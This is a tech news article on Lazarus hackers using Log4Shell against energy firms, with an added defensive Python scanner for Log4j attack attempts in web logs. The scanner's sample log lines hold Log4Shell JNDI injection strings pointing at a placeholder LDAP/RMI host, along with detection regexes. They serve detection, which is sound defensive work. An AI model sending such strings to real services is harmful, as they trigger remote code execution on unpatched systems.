Lazarus hackers are using Log4j to hack US energy companies

Ever-popular zero-day vulnerability rears its head again


Energy providers from around the world, including the United States, Canada, and Japan, have reportedly been targeted by state-sponsored North Korean hacker group Lazarus, also known as APT38.

According to Cisco’s Talos Intelligence group, the campaign aims to infiltrate organizations around the world in order to establish long-term access and subsequently exfiltrate data of interest to the nation-state.

Although the precise targets have remained unnamed, the attacks once again show the threat that North Korea and Lazarus can pose via destabilization efforts.

How did the attack work?

According to Talos, this campaign involved the exploitation of vulnerabilities in the VMware Horizon virtual desktop product to gain an initial foothold in targeted organizations.

After gaining entry into the targeted enterprise networks, the group then deployed custom malware implants, including the HTTP bots VSingle and YamaBot.

In addition to these known malware families, Talos also reported discovering a previously unknown malware implant called “MagicRAT.”

Initial entry into the organizations was reportedly made using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework, which allows arbitrary code execution.
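For defenders wanting to check whether Log4Shell attempts have reached their own web-facing services, the usual first step is to scan request logs for Log4j lookup syntax. The following is an added example, not code from the article or from Talos; the log lines are constructed for illustration (the 203.0.113.0/24 addresses are a documentation range) and the detection is a coarse triage heuristic, not a substitute for patching Log4j.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from the article
# or from Talos's report); 203.0.113.0/24 is a documentation address range.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [16/Sep/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Sep/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [16/Sep/2022:10:01:09 +0000] "GET /portal/?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.10%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.8"',
    '10.0.0.7 - - [16/Sep/2022:10:02:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# A Log4j lookup that names the jndi resolver directly.
DIRECT_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup that contains another lookup before it closes. Legitimate HTTP
# request lines almost never carry Log4j lookup syntax at all, let alone
# nested, so this is worth a look even when "jndi" is not spelled out.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")
# Remote-reference URL schemes JNDI can resolve; recorded as supporting
# evidence only, never as a finding on its own.
JNDI_SCHEME = re.compile(r"\b(?:ldaps?|rmi|dns|iiop)://", re.IGNORECASE)


def analyse_line(line):
    """Return a list of reason tags for one raw log line (empty if clean)."""
    # Undo percent-encoding first: "%24%7B" is "${" and would otherwise be missed.
    decoded = unquote(line)
    reasons = []
    if DIRECT_JNDI.search(decoded):
        reasons.append("direct-jndi-lookup")
    if NESTED_LOOKUP.search(decoded):
        reasons.append("nested-lookup")
    if reasons and JNDI_SCHEME.search(decoded):
        reasons.append("remote-jndi-scheme")
    return reasons


def scan_log_lines(lines):
    """Return [{'line': index, 'reasons': [...]}, ...] for every suspicious line."""
    findings = []
    for idx, line in enumerate(lines):
        reasons = analyse_line(line)
        if reasons:
            findings.append({"line": idx, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {', '.join(finding['reasons'])}")
        print("    ", SAMPLE_LOG_LINES[finding["line"]])
```

Run against the sample, the scanner flags the second line (a plain `${jndi:` lookup in the User-Agent) and the third (a percent-encoded, nested lookup in the query string) and leaves the two ordinary requests alone. A hit only tells you an attempt was logged, not that it succeeded; the vulnerable component is whichever Log4j instance ends up logging the string, which may sit behind the web tier, so follow-up belongs on the application host (Log4j version, outbound LDAP/RMI connections from the JVM) rather than on the proxy alone.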


Cybersecurity company Tenable has previously dubbed Log4Shell “the single biggest, most critical vulnerability ever”.


This wouldn’t be the first time North Korea has been implicated in attacks on foreign powers; security researchers at Kaspersky Lab have linked North Korea to the WannaCry ransomware attack, which disabled 300,000 computers in 150 countries and caused the UK’s NHS unprecedented issues.

Since it was founded in 2010, the Lazarus group has certainly been keeping busy if nothing else. Lately, it’s been turning its attention towards the world of blockchains and DeFi.

Lazarus was linked to a $615 million attack on the Ronin sidechain, which powers the popular blockchain-integrated game Axie Infinity; it is known as one of the largest DeFi hacks to date.

Will McCurdy has been writing about technology for over five years. He has a wide range of specialities including cybersecurity, fintech, cryptocurrencies, blockchain, cloud computing, payments, artificial intelligence, retail technology, and venture capital investment. He has previously written for AltFi, FStech, Retail Systems, and National Technology News and is an experienced podcast and webinar host, as well as an avid long-form feature writer.
